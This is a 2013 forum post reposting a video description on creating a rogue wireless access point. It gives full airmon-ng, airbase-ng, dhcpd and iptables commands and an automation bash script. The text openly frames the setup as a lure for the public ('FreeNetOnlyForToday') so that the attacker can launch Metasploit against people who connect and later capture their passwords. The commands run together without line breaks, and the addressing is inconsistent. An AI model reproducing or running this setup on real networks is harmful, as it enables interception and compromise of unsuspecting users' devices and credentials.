Nytro Posted January 10, 2013 Report Posted January 10, 2013 Create Wireless Rogue Access Point Description: In this video I will show you how to create a fake Access point.What is the purpose to create this Fake Access Point ? Lets see if you are in a public place you have all wifi attack gadgets, and you setup a fake access point in the public places AP name called “FreeNetOnlyForToday” maybe people will try to connect this AP - Now what can you do ? You can fire a Metasploit on it because all connections belong to you and tons of stuff you can perform. In the next video I will cover how to create a fake AP and get Passwords.Steps : - apt-get install dhcp3-serverairmon-ng start wlan0airbase-ng -e FreeNet -c 11 -v wlan0ifconfig at0 upifconfig at0 11.0.0.254 netmask 255.255.255.0route add -net 11.0.0.0 netmask 255.255.255.0 gw 11.0.0.254---- Add Config in dhcp3 ----Path = /etc/dhcp3/dhcpd.conf---- Paste it this -----ddns-update-style ad-hoc;default-lease-time 600;max-lease-time 7200;authoritative;subnet 10.0.0.0 netmask 255.255.255.0 {option subnet-mask 255.255.255.0;option broadcast-address 10.0.0.255;option routers 10.0.0.254;option domain-name-servers 8.8.8.8;range 10.0.0.1 10.0.0.140;}iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainiptables -P FORWARD ACCEPTiptables -t nat -A POSTROUTING -o eth3 -j MASQUERADEecho > '/var/lib/dhcp3/dhcpd.leases'ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.piddhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 echo "1" > /proc/sys/net/ipv4/ip_forwardIf you feel boring to type all these commands no problem ? Use this Bash Script. This bash script will automate your whole process. But check all the connection in bash script or you will get an error.Source : - exploit.co.il#!/bin/bashecho "Killing Airbase-ng..."pkill airbase-ngsleep 2;echo "Killing DHCP..."pkill dhcpd3sleep 5;echo "Putting Wlan In Monitor Mode..."airmon-ng stop wlan0 # Change to your wlan interfacesleep 5;airmon-ng start wlan0 # Change to your wlan interfacesleep 5;echo "Starting Fake AP..."airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interfacesleep 5;ifconfig at0 upifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpddhcpd.confroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254sleep 5;iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainiptables -P FORWARD ACCEPTiptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interfaceecho > '/var/lib/dhcp3/dhcpd.leases'ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.piddhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &sleep 5;echo "1" > /proc/sys/net/ipv4/ip_forward Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Create Wireless Rogue Access Point Quote